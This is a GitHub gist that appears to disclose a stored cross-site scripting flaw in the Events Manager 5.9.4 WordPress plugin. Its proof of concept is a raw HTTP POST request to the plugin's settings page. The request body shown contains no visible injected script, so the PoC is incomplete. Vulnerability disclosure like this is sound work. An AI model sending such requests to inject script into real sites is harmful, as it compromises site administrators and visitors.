Skip to content

Instantly share code, notes, and snippets.

@ansarisec
Created July 3, 2018 15:09
Show Gist options
  • Save ansarisec/12737c207c0851d52865ed60c08891b7 to your computer and use it in GitHub Desktop.
Save ansarisec/12737c207c0851d52865ed60c08891b7 to your computer and use it in GitHub Desktop.
Stored XSS in Event Manager 5.9.4
Product: Events Manager 5.9.4 plugin for wordpress
POC:
POST /wordpress/wp-admin/edit.php?post_type=event&page=events-manager-options HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxxxxx/wordpress/wp-admin/edit.php?post_type=event&page=events-manager-options
Content-Type: application/x-www-form-urlencoded
Content-Length: 736
Cookie: wp-saving-post=41-saved; wordpress_xxxxx
Connection: close
Upgrade-Insecure-Requests: 1
-----
import_settings_file=&dbem_cp_events_slug=events&dbem_cp_locations_slug=locations&dbem_taxonomy_category_slug=events%2Fcategories&dbem_taxonomy_tag_slug=events&Submit=Save+Changes+%28All%29&dbem_event_reapproved_email_body=Dear+%23_CONTACTNAME%2C+%0D%0A%0D%0AYour+event+%23_EVENTNAME+on+%23_EVENTDATES+has+been+approved.%0D%0A%0D%0AYou+can+view+your+event+here%3A+%23_EVENTURL%0D%0A%0D%0A%0D%0A-------------------------------%0D%0A%0D%0APowered+by+Events+Manager+-+http%3A%2F%2Fwp-events-plugin.com&em-submitted=1&_wpnonce=73cfc75e10&tab_path=pages%2Bpermalinks
-----
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment